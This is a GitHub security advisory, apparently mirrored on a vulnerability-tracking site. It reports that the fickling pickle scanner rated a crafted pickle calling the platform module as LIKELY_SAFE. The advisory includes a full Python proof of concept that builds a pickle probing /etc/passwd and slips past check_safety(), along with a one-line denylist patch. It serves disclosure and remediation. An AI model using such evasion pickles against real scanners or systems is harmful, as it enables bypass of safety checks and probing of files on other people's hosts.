GHSA-5CXW-W2XG-2M8H

Vulnerability from github – Published: 2026-03-13 20:58 – Updated: 2026-03-13 20:58
VLAI?
Summary
fickling's `platform` module subprocess invocation evades `check_safety()` with `LIKELY_SAFE`
Details

Our assessment

We added platform to the blocklist of unsafe modules (https://github.com/trailofbits/fickling/commit/351ed4d4242b447c0ffd550bb66b40695f3f9975).

It was not possible to inject extra arguments to file without first monkey-patching platform._follow_symlinks with the pickle, as it always returns an absolute path. We independently hardened it with https://github.com/trailofbits/fickling/commit/b9e690c5a57ee9cd341de947fc6151959f4ae359 to reduce the risk of obtaining direct module references while evading detection.

https://github.com/python/cpython/blob/6d1e9ceed3e70ebc39953f5ad4f20702ffa32119/Lib/platform.py#L687-L695

target = _follow_symlinks(target)
# "file" output is locale dependent: force the usage of the C locale
# to get deterministic behavior.
env = dict(os.environ, LC_ALL='C')
try:
    # -b: do not prepend filenames to output lines (brief mode)
    output = subprocess.check_output(['file', '-b', target],
                                     stderr=subprocess.DEVNULL,
                                     env=env)

Original report

Summary

A crafted pickle invoking platform._syscmd_file, platform.architecture, or platform.libc_ver passes check_safety() with Severity.LIKELY_SAFE and zero findings. During fickling.loads(), these functions invoke subprocess.check_output with attacker-controlled arguments or read arbitrary files from disk.

Clarification: The subprocess call uses a list argument (['file', '-b', target]), not shell=True, so the attacker controls the file path argument to the file command, not the command itself. The impact is subprocess invocation with attacker-controlled arguments and information disclosure (file type probing), not arbitrary command injection.

Affected versions

<= 0.1.9 (verified on upstream HEAD as of 2026-03-04)

Non-duplication check against published Fickling GHSAs

No published advisory covers platform module false-negative bypass. This follows the same structural pattern as GHSA-5hwf-rc88-82xm (missing modules in UNSAFE_IMPORTS) but covers a distinct set of functions.

Root cause

  1. platform not in UNSAFE_IMPORTS denylist.
  2. OvertlyBadEvals skips calls imported from stdlib modules.
  3. UnusedVariables heuristic neutralized by making call result appear used (SETITEMS path).

Reproduction (clean upstream)

from unittest.mock import patch
import fickling
import fickling.fickle as op
from fickling.fickle import Pickled
from fickling.analysis import check_safety

pickled = Pickled([
    op.Proto.create(4),
    op.ShortBinUnicode('platform'),
    op.ShortBinUnicode('_syscmd_file'),
    op.StackGlobal(),
    op.ShortBinUnicode('/etc/passwd'),
    op.TupleOne(),
    op.Reduce(),
    op.Memoize(),
    op.EmptyDict(),
    op.ShortBinUnicode('init'),
    op.ShortBinUnicode('x'),
    op.SetItem(),
    op.Mark(),
    op.ShortBinUnicode('trace'),
    op.BinGet(0),
    op.SetItems(),
    op.Stop(),
])

results = check_safety(pickled)
print(results.severity.name, len(results.results))  # LIKELY_SAFE 0

with patch('subprocess.check_output', return_value=b'ASCII text') as mock_sub:
    fickling.loads(pickled.dumps())
    print('subprocess called?', mock_sub.called)       # True
    print('args:', mock_sub.call_args[0])               # (['file', '-b', '/etc/passwd'],)

Additional affected functions (same pattern): - platform.architecture('/etc/passwd') — calls _syscmd_file internally - platform.libc_ver('/etc/passwd') — opens and reads arbitrary file contents

Minimal patch diff

--- a/fickling/fickle.py
+++ b/fickling/fickle.py
@@
+        "platform",

Validation after patch

  • Same PoC flips to LIKELY_OVERTLY_MALICIOUS
  • fickling.loads raises UnsafeFileError
  • subprocess.check_output is not called

Impact

  • False-negative verdict: check_safety() returns LIKELY_SAFE with zero findings for a pickle that invokes a subprocess with attacker-controlled arguments.
  • Subprocess invocation: platform._syscmd_file calls subprocess.check_output(['file', '-b', target]) where target is attacker-controlled. The file command reads file headers and returns type information, enabling file existence and type probing.
  • File read: platform.libc_ver opens and reads chunks of an attacker-specified file path.
Severity ?
6.9 (Medium)
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N
Show details on source website
To clipboard 

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 0.1.9"
      },
      "package": {
        "ecosystem": "PyPI",
        "name": "fickling"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.1.10"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [],
  "database_specific": {
    "cwe_ids": [
      "CWE-184"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-13T20:58:10Z",
    "nvd_published_at": null,
    "severity": "MODERATE"
  },
  "details": "# Our assessment\n\nWe added `platform` to the blocklist of unsafe modules (https://github.com/trailofbits/fickling/commit/351ed4d4242b447c0ffd550bb66b40695f3f9975). \n\nIt was not possible to inject extra arguments to `file` without first monkey-patching `platform._follow_symlinks` with the pickle, as it always returns an absolute path. We independently hardened it with https://github.com/trailofbits/fickling/commit/b9e690c5a57ee9cd341de947fc6151959f4ae359 to reduce the risk of obtaining direct module references while evading detection.\n\nhttps://github.com/python/cpython/blob/6d1e9ceed3e70ebc39953f5ad4f20702ffa32119/Lib/platform.py#L687-L695\n```python\ntarget = _follow_symlinks(target)\n# \"file\" output is locale dependent: force the usage of the C locale\n# to get deterministic behavior.\nenv = dict(os.environ, LC_ALL=\u0027C\u0027)\ntry:\n    # -b: do not prepend filenames to output lines (brief mode)\n    output = subprocess.check_output([\u0027file\u0027, \u0027-b\u0027, target],\n                                     stderr=subprocess.DEVNULL,\n                                     env=env)\n```\n\n# Original report\n\n## Summary\nA crafted pickle invoking `platform._syscmd_file`, `platform.architecture`, or `platform.libc_ver` passes `check_safety()` with `Severity.LIKELY_SAFE` and zero findings. During `fickling.loads()`, these functions invoke `subprocess.check_output` with attacker-controlled arguments or read arbitrary files from disk.\n\n**Clarification:** The subprocess call uses a list argument (`[\u0027file\u0027, \u0027-b\u0027, target]`), not `shell=True`, so the attacker controls the file path argument to the `file` command, not the command itself. The impact is subprocess invocation with attacker-controlled arguments and information disclosure (file type probing), not arbitrary command injection.\n\n## Affected versions\n`\u003c= 0.1.9` (verified on upstream HEAD as of 2026-03-04)\n\n## Non-duplication check against published Fickling GHSAs\nNo published advisory covers `platform` module false-negative bypass. This follows the same structural pattern as GHSA-5hwf-rc88-82xm (missing modules in `UNSAFE_IMPORTS`) but covers a distinct set of functions.\n\n## Root cause\n1. `platform` not in `UNSAFE_IMPORTS` denylist.\n2. `OvertlyBadEvals` skips calls imported from stdlib modules.\n3. `UnusedVariables` heuristic neutralized by making call result appear used (`SETITEMS` path).\n\n## Reproduction (clean upstream)\n```python\nfrom unittest.mock import patch\nimport fickling\nimport fickling.fickle as op\nfrom fickling.fickle import Pickled\nfrom fickling.analysis import check_safety\n\npickled = Pickled([\n    op.Proto.create(4),\n    op.ShortBinUnicode(\u0027platform\u0027),\n    op.ShortBinUnicode(\u0027_syscmd_file\u0027),\n    op.StackGlobal(),\n    op.ShortBinUnicode(\u0027/etc/passwd\u0027),\n    op.TupleOne(),\n    op.Reduce(),\n    op.Memoize(),\n    op.EmptyDict(),\n    op.ShortBinUnicode(\u0027init\u0027),\n    op.ShortBinUnicode(\u0027x\u0027),\n    op.SetItem(),\n    op.Mark(),\n    op.ShortBinUnicode(\u0027trace\u0027),\n    op.BinGet(0),\n    op.SetItems(),\n    op.Stop(),\n])\n\nresults = check_safety(pickled)\nprint(results.severity.name, len(results.results))  # LIKELY_SAFE 0\n\nwith patch(\u0027subprocess.check_output\u0027, return_value=b\u0027ASCII text\u0027) as mock_sub:\n    fickling.loads(pickled.dumps())\n    print(\u0027subprocess called?\u0027, mock_sub.called)       # True\n    print(\u0027args:\u0027, mock_sub.call_args[0])               # ([\u0027file\u0027, \u0027-b\u0027, \u0027/etc/passwd\u0027],)\n```\n\nAdditional affected functions (same pattern):\n- `platform.architecture(\u0027/etc/passwd\u0027)` \u2014 calls `_syscmd_file` internally\n- `platform.libc_ver(\u0027/etc/passwd\u0027)` \u2014 opens and reads arbitrary file contents\n\n## Minimal patch diff\n```diff\n--- a/fickling/fickle.py\n+++ b/fickling/fickle.py\n@@\n+        \"platform\",\n```\n\n## Validation after patch\n- Same PoC flips to `LIKELY_OVERTLY_MALICIOUS`\n- `fickling.loads` raises `UnsafeFileError`\n- `subprocess.check_output` is not called\n\n## Impact\n- **False-negative verdict:** `check_safety()` returns `LIKELY_SAFE` with zero findings for a pickle that invokes a subprocess with attacker-controlled arguments.\n- **Subprocess invocation:** `platform._syscmd_file` calls `subprocess.check_output([\u0027file\u0027, \u0027-b\u0027, target])` where `target` is attacker-controlled. The `file` command reads file headers and returns type information, enabling file existence and type probing.\n- **File read:** `platform.libc_ver` opens and reads chunks of an attacker-specified file path.",
  "id": "GHSA-5cxw-w2xg-2m8h",
  "modified": "2026-03-13T20:58:10Z",
  "published": "2026-03-13T20:58:10Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/trailofbits/fickling/security/advisories/GHSA-5cxw-w2xg-2m8h"
    },
    {
      "type": "WEB",
      "url": "https://github.com/trailofbits/fickling/commit/351ed4d4242b447c0ffd550bb66b40695f3f9975"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/trailofbits/fickling"
    },
    {
      "type": "WEB",
      "url": "https://github.com/trailofbits/fickling/releases/tag/v0.1.10"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "fickling\u0027s `platform` module subprocess invocation evades `check_safety()` with `LIKELY_SAFE`"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.

Sightings

Author Source Type Date Other

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.